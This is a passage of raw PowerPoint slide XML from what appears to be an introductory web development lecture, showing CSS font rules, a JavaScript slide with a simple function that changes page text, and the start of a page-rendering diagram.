              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>serif;</a:t>
            </a:r>
            <a:endParaRPr sz="1600" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="168275">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="30"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="168275">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="30"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>p.sansserif</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="168275">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="30"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>font-family: Arial, Helvetica,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-40" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>sans-serif;</a:t>
            </a:r>
            <a:endParaRPr sz="1600" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="168275">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="30"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30639936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8714B-40CF-0C40-8BE8-73A661F7DE0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>JavaScript</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{996CEBEC-E466-464A-9A6D-A08B351AF76D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Programming language used to manipulate  web pages. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It is a high-level, untyped and  interpreted language with support for objects.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Supported by all web browsers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CCC1E3E-36CA-CD45-A844-519E0AE38ABE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="4953000"/>
            <a:ext cx="7628890" cy="1520825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="9524">
            <a:solidFill>
              <a:srgbClr val="282888"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="132715" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="85090">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1045"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="85090" marR="220345">
              <a:lnSpc>
                <a:spcPct val="101600"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>function myFunction() </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>{  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>document.getElementById("demo").innerHTML </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>”Text</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-95" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>changed.";</a:t>
            </a:r>
            <a:endParaRPr sz="1600" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="85090">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="30"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="85090">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="30"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28372661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E94E43-2FDF-D048-B173-85885BEACAFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Page Rendering</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F19D02A4-E518-3D49-9175-744B3F1BD865}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="176015" y="3329935"/>
            <a:ext cx="647065" cy="360680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2200" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>page</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63CDBDE2-4B36-EB49-B5BF-699D11F05999}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1750815" y="1629665"/>
            <a:ext cx="786130" cy="360680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2200" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B9CCC69-9D09-9343-9CF6-9495D5139ED4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="952301" y="2975406"/>
            <a:ext cx="591820" cy="553085"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="591819" h="553085">
                <a:moveTo>
                  <a:pt x="0" y="553058"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="591216" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="19049">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B41C75B-D157-FF40-B09B-9F2D77E26410}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1512498" y="2906822"/>
            <a:ext cx="103678" cy="101087"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId2" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D60988D-5DE3-624E-BBCD-326D2E43B680}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1662113" y="2570687"/>
            <a:ext cx="600075" cy="360680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2200" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>CSS</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33747D75-F325-CE4F-B707-3975AE3BE602}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1242815" y="3966253"/>
            <a:ext cx="1283335" cy="360680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2200" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Javascript</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13D0BC6B-B104-6843-B0CA-500AF0233615}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="952301" y="2024596"/>
            <a:ext cx="668655" cy="1504315"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="668655" h="1504314">
                <a:moveTo>
                  <a:pt x="0" y="1503869"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="668352" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="19049">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65BF2056-3178-8141-824C-38B78E4BA1D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1582375" y="1936071"/>
            <a:ext cx="82913" cy="110828"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="object 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5637B7A-F1AA-B841-9500-7D723C353DA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="963017" y="3528464"/>
            <a:ext cx="171450" cy="522605"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="171450" h="522604">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="171186" y="522524"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="19049">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="object 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{325E3972-F735-4648-970D-F873754BF1C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1094777" y="4031668"/>
            <a:ext cx="78853" cy="111000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="object 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92CFBB5E-1CE0-DB47-8EF9-BEC3703DFD1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2743200" y="1615440"/>
            <a:ext cx="762000" cy="431165"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="762000" h="431164">
                <a:moveTo>
                  <a:pt x="546556" y="430886"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="546556" y="323165"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="323165"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="107721"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546556" y="107721"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546556" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="761999" y="215443"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546556" y="430886"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="BBE0E3"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="object 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D25A845-5B01-2D49-8634-3FE9BB00E0CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2743200" y="1615440"/>
            <a:ext cx="762000" cy="431165"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="762000" h="431164">
                <a:moveTo>
                  <a:pt x="0" y="107721"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="546556" y="107721"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546556" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="761999" y="215443"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546556" y="430886"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546556" y="323165"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="323165"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="107721"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9524">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="object 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60F88E31-A1A0-0640-A64A-FB4E07095C7F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3505200" y="1619457"/>
            <a:ext cx="1905000" cy="431165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF99"/>
          </a:solidFill>
          <a:ln w="9524">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="26670" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="85725">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="210"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2200" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-40" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Parser</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="object 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36DB8295-B973-C246-B462-A417CFEF08D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2427683" y="2565451"/>
            <a:ext cx="762000" cy="431165"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
